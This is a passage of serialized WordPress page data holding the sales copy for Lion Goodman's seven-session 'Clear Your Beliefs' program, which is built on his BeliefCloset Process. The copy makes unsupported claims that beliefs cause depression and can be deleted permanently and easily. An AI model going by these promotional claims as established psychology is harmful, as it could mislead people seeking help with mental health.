Experience</h1></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"13";s:4:"cell";s:1:"0";s:2:"id";s:2:"15";s:5:"class";s:14:"WP_Widget_Text";}}i:16;a:4:{s:5:"title";s:0:"";s:4:"text";s:515:"<div class="parg-text"><p>Your psychological, emotional, and spiritual dis-ease are caused primarily by your beliefs. We usually think of beliefs as consciously held convictions, but our strongest and most deeply held beliefs are unconscious. They operate through us, and they are at the root of all the habits and patterns in our life. But we’re only dimly aware of them, or not aware of them at all. <strong>Yet beliefs are at the core of every experience, decision, and pattern in our lives.</strong></p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"13";s:4:"cell";s:1:"0";s:2:"id";s:2:"16";s:5:"class";s:14:"WP_Widget_Text";}}i:17;a:4:{s:5:"title";s:0:"";s:4:"text";s:0:"";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"13";s:4:"cell";s:1:"0";s:2:"id";s:2:"17";s:5:"class";s:14:"WP_Widget_Text";}}i:18;a:4:{s:5:"title";s:0:"";s:4:"text";s:1001:"<div class="parg-img"><img width="158" height="118" alt="construction-300x224" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg" class=" wp-image-320 alignleft">\n<p class="parg-text text-blue">Beliefs can be seen as the literal foundation of consciousness, upon which our thoughts, feelings, and attitudes are built.</p>\n<p class="parg-text"><strong>We literally <u>create our reality</u> with our beliefs.</strong></p>\n<img width="157" height="114" alt="dilap" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg" class=" wp-image-321 alignright">\n<p class="parg-text">If you build a house on a shaky ground, it doesn’t matter how much redecorating you do. It will buckle, and eventually fall. You can fervently practice meditation, visualization, or business building skills, but if there are sneaky saboteurs in the basement of your mind, pulling the foundation out from under you, you won’t be able to achieve permanent success.</p>\n</div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"14";s:4:"cell";s:1:"0";s:2:"id";s:2:"18";s:5:"class";s:14:"WP_Widget_Text";}}i:19;a:4:{s:5:"title";s:0:"";s:4:"text";s:74:"<div class="parg-title"><h1>Upgrade Your Human Operating System</h1></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"15";s:4:"cell";s:1:"0";s:2:"id";s:2:"19";s:5:"class";s:14:"WP_Widget_Text";}}i:20;a:4:{s:5:"title";s:0:"";s:4:"text";s:306:"<div class="parg-text"><p>Your brain/mind is more sophisticated than the fastest supercomputer. Like a computer, you have an underlying Operating System. If your O.S. has faulty programming, havoc results – especially when you try to run a sophisticated application – like managing your life.</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"15";s:4:"cell";s:1:"0";s:2:"id";s:2:"20";s:5:"class";s:14:"WP_Widget_Text";}}i:21;a:4:{s:5:"title";s:0:"";s:4:"text";s:224:"<div class="parg-text"><p>Negative beliefs operate like a badly programmed operating system, messing up everything else, and preventing you from doing what you came here to do. Do you ever have thoughts like these?</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"15";s:4:"cell";s:1:"0";s:2:"id";s:2:"21";s:5:"class";s:14:"WP_Widget_Text";}}i:22;a:4:{s:5:"title";s:0:"";s:4:"text";s:796:"<div class="icon_box bullets">\n<ul class="two-col">\n<li><strong><em>I’m not enough.</em></strong></li>\n<li><strong><em>I can’t do it.</em></strong></li>\n<li><strong><em>I’m not worthy.</em></strong></li>\n<li><strong><strong><em>I’ll never be like them.</em></strong></strong></li>\n<li><strong><em>I’m all alone.</em></strong></li>\n</ul>\n<ul class="two-col rt">\n<li><strong><em>I need to do more (or better) to be accepted.</em></strong></li>\n<li><strong><em>There’s something wrong with me.</em></strong></li>\n<li><strong><em>I’m fundamentally flawed.</em></strong></li>\n<li><strong><em><strong><em>Nobody wants what I have to offer.</em></strong></em></strong></li>\n<li><strong><em><strong><em>If I speak up, something bad will happen.</em></strong></em></strong></li>\n</ul>\n</div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"16";s:4:"cell";s:1:"0";s:2:"id";s:2:"22";s:5:"class";s:14:"WP_Widget_Text";}}i:23;a:4:{s:5:"title";s:0:"";s:4:"text";s:212:"<div class="parg-text"><p>These beliefs may appear as inner voices that criticize or diminish you. They can cause depression, self-loathing, over-achieving, self-sacrifice, or other negative conditions.</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"17";s:4:"cell";s:1:"0";s:2:"id";s:2:"23";s:5:"class";s:14:"WP_Widget_Text";}}i:24;a:4:{s:5:"title";s:0:"";s:4:"text";s:231:"<div class="parg-text"><p>At the core of every bad feeling you have about yourself, and every limitation you have, there’s a belief operating in the background, like an annoying little machine that you can’t turn off.</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"18";s:4:"cell";s:1:"0";s:2:"id";s:2:"24";s:5:"class";s:14:"WP_Widget_Text";}}i:25;a:4:{s:5:"title";s:0:"";s:4:"text";s:230:"<div class="parg-text"><p><strong>Here’s the good news:</strong> <strong><span style="color: #333399;">Every belief, no matter how deep, can be pulled up for examination, and changed. Simply and easily.</span></strong></p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"19";s:4:"cell";s:1:"0";s:2:"id";s:2:"25";s:5:"class";s:14:"WP_Widget_Text";}}i:26;a:4:{s:5:"title";s:0:"";s:4:"text";s:62840:"<h1>The Garden Of Your Mind</h1>\n\n<p style="text-align: left;"><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1.jpg"><img class=" wp-image-246 alignright" style="margin-left: 20px; margin-right: 20px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1-300x300.jpg" alt="brain-tree" width="150" height="150" /></a> When you build a new garden, you begin by clearing the ground, removing rocks and weeds. Then you amend the soil and install a watering system so your plants will thrive. Only THEN do you plant the fruits, vegetables and flowers you want to grow and enjoy.<br /><br />\n\nThe same thing is true in your subconscious mind:\n\n<strong>First clear the old beliefs out of the way, THEN install new, empowering beliefs you want to enjoy.</strong><br /><br />\n\n<strong>It''s that simple.</strong></p>\n\n\n<h1>Beliefs Reside In The Subconscious Mind</h1>\n<div class="parg-text"><p style="text-align: left;">If you want to change your beliefs, you have to work with them<em> where they live</em>. <strong>Your conscious mind isn''t the right tool for making changes in your subconscious</strong> – it''s like tilling the garden with a screwdriver.</p>\n<p style="text-align: left;"><img class=" wp-image-323 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/water-300x201.jpg" alt="water-300x201" width="179" height="119" />To pull old beliefs out by the root, you need an effective method that dives down to the core of your psyche – deeper than words can go, deeper than talk therapy, or weekend workshops.</p>\nWhen you make changes in your subconscious mind directly, change is permanent. <strong>You become different. Life becomes different.</strong></p>\n\n<div class="parg-text"><p>A shift at the core of the psyche expands out like a pebble’s wave in a still pond – effortlessly and easily. <strong>The new beliefs you choose simply manifest – without repetition, resistance or struggle.</strong></p></div>\n\n&nbsp;\n\n&nbsp;\n<h1>Beliefs Are The Lens Through Which You See The World</h1>\n<div class="parg-text"><p><strong><em>How you see yourself</em> </strong>is determined by your beliefs - most of which were indoctrinated into you.</p>\n\n<div class="parg-text"><p><em><strong>How you view others </strong></em>is colored by your beliefs about them.</p>\n\n<div class="parg-text"><p><img class=" wp-image-322 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/glasses1-300x256.jpg" alt="glasses1-300x256" width="164" height="140" /><strong><em>Your experience of the world </em></strong>is shaped (and often distorted) by your beliefs. <em><strong>Your entire life experience</strong> </em>is constructed by the beliefs you''ve accumulated since you were an infant.</p>\n\n<div class="parg-text"><p>Change the lens of your beliefs, and you’ll change <strong>both</strong> your perception <strong><span style="text-decoration: underline;">and</span></strong> your experience. <strong>Change your beliefs, and your circumstances and your possibilities will also change.</strong></p>\n\n<div class="parg-text"><p><strong> <span style="color: #000080;">It’s that simple.</span></strong></p></div></div></div></div>\n\n&nbsp;\n<h1>Why Beliefs Are Difficult To Change</h1>\n<div class="parg-text"><p>Many people agree that, <em>“Your beliefs create your reality,” </em>and tell you to "<em>Just change your beliefs!</em>" Few offer specific tools that will change your beliefs <em>permanently</em>. There’s a good reason: <strong>Beliefs </strong><strong>reside in your subconscious mind </strong>– below the level of conscious awareness.</p></div>\n\n<div class="parg-text"><p><strong>When you were young, your parents and caregivers indoctrinated you with their beliefs</strong>. It began when you were an infant, before you could speak. Those indoctrinated beliefs are buried deep in your pre-verbal memory. Most methods can''t reach the basement where they''re stored.</p></div>\n\n<div class="parg-text"><p>Your parents and caregivers indoctrinated you for a good reason: they wanted you to survive and thrive. Their beliefs allowed <em>them</em> to survive, so they wanted you to have those beliefs, too – whether they were a good fit for you or not. They didn’t know any better. it’s exactly what <em>their parents</em> did to<em> them</em>.</p></div>\n\n<div class="parg-text"><p>You formed your <strong>self-view</strong> and <strong>world-view</strong> from those indoctrinated beliefs, unconsciously. You didn''t know any better at the time, and you rarely questioned it. It was just "what was so."</p></div>\n\n&nbsp;\n<h1>Why We React The Way We Do</h1>\n<div class="parg-text"><p>When you <strong>react</strong> to someone or something, you''re seeing old beliefs at work. You may ask yourself afterwards:</p></div>\n\n<div class="parg-text"><p><img class="alignleft wp-image-298" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/react1-300x217.jpg" alt="react" width="187" height="135" /></p></div>\n\n<p><ul class="indented-img-left"><br />\n	<li>Why did I say that?</li>\n	<li>What’s wrong with me?</li>\n	<li>Why didn’t I follow through?</li>\n	<li>Why did I react that way?</li>\n	<li>What the hell just happened?</li>\n</ul></p>\n<em>\n<div class="parg-text"><p>"Sudden Reaction Syndrome"</em> can be traced back to the beliefs buried deep in your subconscious mind. Whenever your early childhood beliefs get triggered, the old pattern of reaction jumps up and hijacks your logical, adult mind.</p></div>\n\n<div class="parg-text"><p>These programs are like mousetraps in your mind’s basement. They lie quietly until someone steps on them. Then they snap, and take control. You suddenly react. Your responses and behavior are suddenly out of your own conscious control.</p></div>\n\n<div class="parg-text"><p><strong>You can change these reactive patterns – if you’re willing to clean out your basement.</strong></p></div>\n\n&nbsp;\n<h1>Why Most Belief-Change Methods Don''t Work</h1>\n<div class="parg-text"><p><strong>Here''s a test for any method of changing beliefs: Did the problem go away completely?</strong> Did it stay away? Or did it return?</p></div>\n\n<div class="parg-text"><p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1.jpg"><img class="alignright  wp-image-248" src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1-300x225.jpg" alt="eye" width="179" height="134" /></a>Every method works for some people, some of the time. If you can use it to create permanent change, it''s a good methodology for you. But most methods create only temporary relief. Beliefs return, and cause the same problem again and again. </p></div><p><strong>Here''s why:</strong></p>\n<ul class="indented">\n	<li><span style="color: #333399;"><strong>Affirmations</strong> </span>are new beliefs you want to install. You can say them all day long, but they don’t change anything at the subconscious level. Repeating them over and over is like stomping on weeds, hoping they go away on their own. Affirmations make you feel better in the short term, but the feelings fade quickly – because the previous beliefs haven''t been eliminated from the subconscious.</li>\n	<li><span style="color: #333399;"><strong>That Belief Isn''t True.</strong> </span> Many methods help you recognize that an old belief isn’t true anymore. Techniques like Byron Katie''s <em>The Work</em> free you at the conscious level, but they don''t clear the causal level, where beliefs are stored in the subconscious mind.</li>\n	<li><span style="color: #333399;"><strong>Tap Your Problem Away. </strong> </span>Many techniques use muscle testing or tapping (e.g., EFT) to shift your attention and energy. They may remind you to love yourself just the way you are (which is good advice!). At the moment you tap or test, your blocked energy is freed, and you can move forward. But too often, you meet those same negative beliefs further down the road.</li>\n</ul>\n<div class="parg-text"><p>Most belief-change methodologies have the same result – the old beliefs pop up again later. The process didn''t create permanent change. <strong>The problem isn’t you! The problem is with the method – it was only partially effective!</strong></p></div>\n\n&nbsp;\n<h1>Here’s Some Good News</h1>\n<ul class="indented">\n	<li><strong><strong><strong><span style="color: #000080;">First:</span> It’s not your fault. There''s nothing wrong with you.</strong></strong></strong></li>\n	<li><strong><span style="color: #000080;">Second:</span> You <span style="text-decoration: underline;">can</span> change your beliefs <em>permanently</em>.</strong></li>\n</ul>\n<div class="parg-text"><p>To get real, lasting change, you need to use a process that pulls your limiting and negative beliefs out by the<em> roots</em>. Otherwise, they’ll pop up later and create the same problem – again and again.</p></div>\n\n<div class="parg-text"><p>You can now <em><strong>Clear Your Beliefs – </strong></em><strong>permanently</strong>.</p></div>\n\n<h1>Imagine The Life You Desire</h1>\n<div class="parg-text"><p><strong>Can you imagine this?</strong></p>\n\n<img class="alignleft wp-image-296" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/mother-daughter2-300x200.jpg" alt="mother-daughter" width="197" height="131" />\n\n	<p>You''re no longer held back by old beliefs and stories.</p>\n	<p>There''s no resistance to doing what needs to be done.</p>\n	<p>You feel joy and positive energy as you move forward to create the life of your dreams.</p>\n\n&nbsp;\n<h1>Want To Manifest? Begin With A Mind Makeover</h1>\n <div class="parg-text"><p><strong><em>Manifestation</em> is the process of envisioning what you want, and then doing whatever is necessary to turn it into a reality. </strong></p>\n\n<div class="parg-text"><p><img class="alignright wp-image-756" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/shell1-300x200.jpg" alt="shell" width="188" height="125" />However, whenever you start a new project, or attempt to create something new, your old beliefs jump up and offer their unwanted advice: <em>"You''ll never accomplish that." "No one would pay money for it!" "Who do you think you are?"</em></p>\n\n<div class="parg-text"><p>Those discouraging words often stop us from moving forward. You need a way to clear those voices – because they WILL come up – it''s inevitable. It''s how beliefs work.</p>\n\n<div class="parg-text"><p><em><strong>Clear Your Beliefs</strong></em> is a completely new approach to solving this problem. The process is easy to learn, and easy to do.<strong> It changes beliefs at the core of the psyche, so they never return.</strong></p>\n\n&nbsp;\n<h1>Clear Whatever Is In The Way</h1>\n<div class="parg-text"><p><img class="alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/puddle1-300x300.jpg" alt="puddle" width="146" height="146" />You can finally remove those pesky blocks and barriers that keep getting in your way. Using a powerful (and fun) guided imagery process, you''ll be guided to reach down into your subconscious mind to the source of your old beliefs. When you delete them from here, they don’t come back. Old thoughts, doubts, and fears simply disappear – for good. Your life changes. You can create what you want, without interference.</p>\n\n<div class="parg-text"><p><strong>The<em> Clear Your Beliefs process</em> frees you </strong>from unwanted negative voices and experiences by dissolving emotional and somatic anchors that hold your negative beliefs in place. <strong>As a result, you have more of the experiences you want, and fewer of the experiences you <em>don’t</em> want.</strong></p>\n\n&nbsp;\n<h1>Is This A Guaranteed Cure-All?</h1>\n<div class="parg-text"><p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol.jpg"><img class="alignright  wp-image-877" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol-225x300.jpg" alt="praying to Sol" width="129" height="172" /></a>Unfortunately, no. There are no magic bullets that can remove your suffering instantly and magically. We use words like "<em>You can create the life of your dreams...</em>" to tell you what you CAN achieve, if you do the work.</p>\n\n<div class="parg-text"><p>No technique can cure your ills or transform your life if you don''t use it. It takes work and dedication on your part. As miraculous as this process is, there are no free rides.</p>\n\n<div class="parg-text"><p>During the past ten years, thousands of clients have used this technique to clear almost every type of problem and issue known to humans. When you place your attention on the source, at the causal level, down where your beliefs are stored, you can clear your earliest, pre-verbal programs. It takes some work, and it''s <em>very </em>effective.</p>\n\n&nbsp;\n<h1>The Clear Your Beliefs program can:</h1>\n<ul class="indented">\n	<li>Eliminate blocks, resistance, and fears that have prevented you from showing up authentically and fulfilling your purpose.</li>\n	<li>Remove the cold, wet blanket that your parents, teachers, and society threw over you (and your dreams) when you were young.</li>\n	<li>Give you the power to change your experiences – and your circumstances – at will.</li>\n	<li>Show you how to gain mastery over your moods, perceptions, and responses.</li>\n</ul>\n&nbsp;\n<h1>How the <em>Clear Your Beliefs </em>Program Shifts Your Life</h1>\n <div class="parg-text"><p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected.jpg"><img class="alignleft wp-image-962 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected-300x225.jpg" alt="lotus flower reflected" width="180" height="135" /></a>During the 7-week <em>Clear Your Beliefs</em> program, all aspects of you – mental, emotional, physical, and spiritual – are invited to work together to transform your psychological <em>set point</em> – the inner structure of your personality that formed during your first years of life.</p></div>\n\n <div class="parg-text"><p>If you’re ready to remove limitations that have held you back, and create the life of your dreams, join us for this 7-part program skillfully led by Lion Goodman, creator of the <em>BeliefCloset Process<strong>. </strong></em></p></div>\n\n <div class="parg-text"><p>During each class, you’ll uproot subconscious beliefs that have interfered with your success, happiness and personal freedom. You’ll upgrade your health, your work, and your relationships. You’ll examine and eliminate beliefs that were programmed into you about yourself, other people, and the world.</p></div>\n\n <div class="parg-text"><p>If you''re purchasing this program as a part of a Clear Your Beliefs Coaching package, your Coach will meet with you once each week (or as you''ve arranged) to follow up on the work you did with the recorded class.  He or she will help you go deeper than you could possibly go with a recorded class, or on your own.  He or she will guide you carefully into the depths of your subconscious beliefs, and make this program even more effective.</p></div>\n<div class="icon_box">\n<h1>With This Methodology, You Can Finally:</h1>\n<ul class="check">\n	<li>Manifest your dreams and your life purpose<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway.jpg"><img class=" wp-image-317 alignright" style="" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway-220x300.jpg" alt="stone-doorway" width="150" height="205" /></a></li>\n	<li>Remove resistance and barriers</li>\n	<li>Open doors to new opportunities</li>\n	<li>Eliminate pain and suffering from the past</li>\n	<li>Experience more fulfillment in your relationships</li>\n	<li>Attract more abundance and prosperity</li>\n	<li>Increase your energy, vitality, and productivity</li>\n</ul>\n</div>\n <div class="parg-text"><p><strong>You’ll step more fully into living as the magnificent, radiant being you already are</strong> (and eliminate the fear of doing so!).\n\n&nbsp;\n<div class="message_box">\n<h1>A Message from Lion Goodman...</h1>\n<div class="mb-img">\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg"><img class="alignleft wp-image-384 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg" alt="lion-full1" width="171" height="236" /></a></div>\n<p>Dear Explorer:</p>\n<p>As a child, I believed there was something wrong with me. I didn’t look or feel like the other kids. I didn’t like who I was. I felt separate and alone. I didn’t know how to make it better.</p>\n\n<p>I was gripped by some of life’s biggest questions: “Who am I? Why am I here? What makes me different? What is life about?"</p>\n\n<p>I began to search for answers, learning everything I could, hoping someday I would figure it all out, and finally become normal and accepted. (Fortunately, the “normal” part never happened!)</p>\n\n<p>After decades of studying psychology, neurology, philosophy, history, religions, and engaging in therapy, workshops, and spiritual practices, I found answers to most of my questions.</p>\n\n<p>I noticed that whenever my life changed for the better, there had been shifts in my beliefs: When I changed my beliefs about myself, I became happier and more successful. When I changed my beliefs about others, my relationships improved. When I shifted my beliefs about the world and it’s possibilities, new opportunities came my way.</p>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1.jpg"><img class=" wp-image-295 alignright" style="margin-top: 5px; margin-bottom: 5px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1-289x300.jpg" alt="studied" width="198" height="206" /></a>The most powerful leverage for success turned out to be <em><strong>my beliefs</strong></em>. So I searched for ways to change beliefs directly. I wanted a method that worked consistently, and transformed beliefs permanently.</p>\n\n<p>The belief-change methods I studied turned out to be only partially effective. I asked Source to help me with this dilemma. And one day, I received a divine gift: a “download” – a way to delete beliefs easily and permanently by engaging the subconscious mind in a playful way. I called it <em>The BeliefCloset Process<strong>®</strong></em> because it used the colorful metaphor of <em>clothing in your closet</em> to represent <em>beliefs in your subconscious mind</em>.</p>\n\n<p>When your closet is crammed full of old outfits you’ll never wear, it’s time for some Spring cleaning!</p>\n\n<p><em>The BeliefCloset Process</em> turned out to be much more than a belief-delete button. It''s a method for <strong>healing deep psychological wounds.</strong></p>\n\n<p>Having worked with thousands of clients over the past decade, I’ve watched profound change echo through their lives, lightening their burdens and creating a brighter future. During the past decade, I’ve taught this methodology to hundreds of coaches, therapists and healers in 18 countries around the world. Testimonials from clients pour in, expressing deep gratitude for the ability to clear long-standing problems that other methods haven’t touched.</p>\n\n<p>I am grateful to have brought it through. Now I want to share it with you. In the <strong><em>Clear Your Beliefs </em></strong>program, you''ll use the <em>BeliefCloset Process </em>to shift beliefs that no longer serve you. <a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1.jpg"><img class=" wp-image-253 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1-220x300.jpg" alt="key" width="151" height="207" /></a>Your old programs might be creating a mess in your relationship with your partner, or your children. They might be limiting your business or financial success. Your beliefs about work may be making you unhappy, or your beliefs about your body may be impacting your health.</p>\n\n<p>If you feel limited or stuck in any part of your life, there are beliefs underneath those feelings – and you can change them.</p>\n\n<p>A lot of people say, “just change your beliefs...” as if it were easy. The truth is, it takes the right technique, applied in the right way, along with the right guidance.</p>\n\n<p>In the <em>Clear Your Beliefs</em> course, you’ll get guidance from me, through a series of recorded classes. If you''re registering as a part of a Clear Your Beliefs Coaching package, you''ll work with your professional <em>Clear Your Beliefs Coach </em>in private sessions to follow up on your work with each recording.  You''ll experience seven sessions of deep healing and transformation, then go deeper with your coach each week. Clear your old beliefs, and create the life you want.</p>\n\n<p>This is <em>true self-empowerment</em>. Decide what you want, and how you want to live. Then go out and make it so. Use the process to clear whatever gets in your way. Your light will shine more brightly, and new possibilities will open.</p>\n\n<p>Live the life of your dreams. There’s nothing to stop you – except a few old beliefs...</p>\n\n<p>In gratitude, and with warm wishes for your total success,</p>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png"><img class="alignnone  wp-image-490 no-shad" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png" alt="lion-signature-300x70" width="377" height="87" /></a>\n\n<p>Lion Goodman, Creator of <em>The BeliefCloset Process</em></p>\n\n</div>\n&nbsp;\n<h1>Register Today and Discover What''s Possible</h1>\n <div class="parg-text"><p>We are delighted to offer you this empowering program, which thousands of people from around the world have successfully completed. You''ll receive <strong>seven 90-minute recorded sessions</strong>, which you can listen to at your convenience, and if you''ve registered for a coaching package, you''ll go deeper each week with your coach. You’ll learn about beliefs and how to change them with the <em>BeliefCloset Process</em>, a powerful methodology used by hundreds of coaches and therapists around the world.</p></div>\n\n&nbsp;\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 1:   </span><strong>Pull All the Old Junk Out of Your BeliefCloset®</strong></h5>\n</div>\n<div class="module_body">\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1.jpg"><img class=" wp-image-309 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1-199x300.jpg" alt="mod1" width="130" height="212" /></a>When you begin Spring cleaning, the first step is that dreaded moment when you open the door to your closet, and realize that you have to take everything <strong>out</strong> in order to begin the sorting process, before you can decide what to keep and what to toss.</p>\n\n<p>In this first session, you’ll examine your old beliefs, and determine which ones no longer serve you.  It’s time to discard them and clear some space!  You’ll get your first in-depth experience with the <em>BeliefCloset Process</em> and discover that you can permanently delete a belief from your past – even beliefs that have been annoying you for decades.  You’ll feel more open, empowered and free to choose your beliefs and the way you live your life.</p>\n\n</div>\n<div class="module_body">\n\n<strong> In Session 1, you will:</strong>\n<ul>\n	<li>Discover old limiting beliefs that are deeply buried in your subconscious mind</li>\n	<li>Learn which ones keep you stuck, preventing you from having what you want in life</li>\n	<li>Experience a process that returns you to your True Self, the home of inner joy and bliss</li>\n	<li>Begin to work with, not against, your subconscious mind – where your beliefs reside</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 2:   </span><strong>Clear Your Negative Beliefs About Who You Are</strong></h5>\n</div>\n<div class="module_body">\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2.jpg"><img class=" wp-image-375 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2-300x199.jpg" alt="sess2" width="194" height="128" /></a>In the 2nd module, you’ll focus on issues and problems that have kept you from being happy and joyful.</p>\n\n<p>What do you believe about yourself? Your idea of “Who I am” is based on beliefs and programming you got as a child.  What messages did your parents, caregivers, and siblings plant in your child brain that still affect you? In the BeliefCloset, keeping your old beliefs about who you are is akin to keeping all of your infant clothes (including those smelly diapers!) in your closet.  It’s time to haul them out, and toss them out! You don’t need them anymore.  If you hear critical inner voices berating you, don’t miss this session.  Rid yourself of those pesky critical voices along with the diapers!</p>\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 2, you will:</strong>\n<ul>\n	<li>Use the <em>BeliefCloset Process</em> to get underneath negative feelings about yourself</li>\n	<li>Clear old, limiting beliefs about who you are, and what you deserve, so you can enjoy life again</li>\n	<li>See your own magnificence through a new clear lens of your own beauty and joy</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 3:  </span><strong>Clear Your Limiting Beliefs About What You Are Capable Of</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3.jpg"><img class=" wp-image-311 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3-300x200.jpg" alt="sess3" width="206" height="137" /></a>Your abilities are limited only by your beliefs. If someone else can do it, so can you.\n\nThis isn’t a magic pill – you still have to learn skills and practice them – but the only thing in your way is your old beliefs.\n\n<em>What are you capable of?  </em>If your answer is “Anything...” you don’t need this session.  But most of us think too small...\n\n</div>\n<div class="module_body">\n\nOur <em><strong>will</strong></em> has been weakened from lack of use – like muscles that shrink when they''re not exercised.  We let our negative beliefs stop us. You may hear internal voices say, <em>“What’s the use?  You’ll fail anyway. You don’t deserve happiness – look at you!”  </em>We were shamed into thinking that we were less than others.We learned to compare ourselves to others – and we always lose that contest.  Clear out any apparent limitations you''ve taken on, and find your true power to create what you want.  Do whatever you need to do in order to achieve your vision.\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">Do you have beliefs that stop you from dreaming big, or following through? Do you procrastinate or get distracted? In this session, you’ll eliminate those beliefs and relieve yourself of those symptoms. You’re already a master manifestor – you''re just manifesting your old programs!</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 3, you will:</strong>\n<ul>\n	<li>Identify old beliefs that stand between you and creating the life you want</li>\n	<li>Dissolve the old beliefs that get in your way over and over, or make you quit when you’re partway there.</li>\n	<li>Imagine what it means to live without self-imposed limitations, trusting that you can create anything you want</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 4:   </span><strong>Clear Your Outdated Beliefs About Love and Relationships</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4.jpg"><img class=" wp-image-312 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4-300x177.jpg" alt="sess4" width="237" height="141" /></a>In this session, you’ll delete beliefs that interfere with your personal relationships.\n\nIf you’re married, are you happy and secure?   Or are you anxious about the future?   If you’re not in a relationship, what’s holding you back from finding your ideal mate?\n\nHumans are social creatures – we must relate to others to survive.  At our core, we want a security and safety, but we also want passion and romance.  You learned “what love is” from your parents – so it’s no wonder that you’re confused!  Most of us repeat patterns we learned from our early childhood.  We watched our parents interact, and Mom and Dad’s relationship became our model of what a relationship is supposed to look like.  In your family, love may have been  contaminated by disdain, contempt, withdrawal, or abuse.  We were programmed to repeat their patterns – without conscious choice.  This session looks at early infant bonding patterns and how those patterns get reproduced in our adult relationships unconsciously – until we change them.\n\n</div>\n&nbsp;\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 4, you will:</strong>\n<ul>\n	<li>Look deeply into the childhood patterns that enabled you to survive and thrive</li>\n	<li>See which of your beliefs now interfere with your intimate relationships</li>\n	<li>Discover how easy it is to shift these beliefs at the core of the psyche and transform relationship difficulties into vibrant, loving interactions</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 5:   </span><strong>Clear Your Old Beliefs About Money and Work</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5.jpg"><img class=" wp-image-313 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5-300x200.jpg" alt="sess5" width="222" height="148" /></a>In this session, you’ll focus on money, wealth and abundance – or the lack thereof!\n\nWhat do you believe about earning a living in today’s economy?   Is money really the root of all evil?\n\nIf you want to experience true abundance, you have to eliminate the belief that money is bad – or a problem.   Your current financial state is a reflection of the beliefs you inherited from your family, religion, and culture.   Can you see their influence?\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 5, you 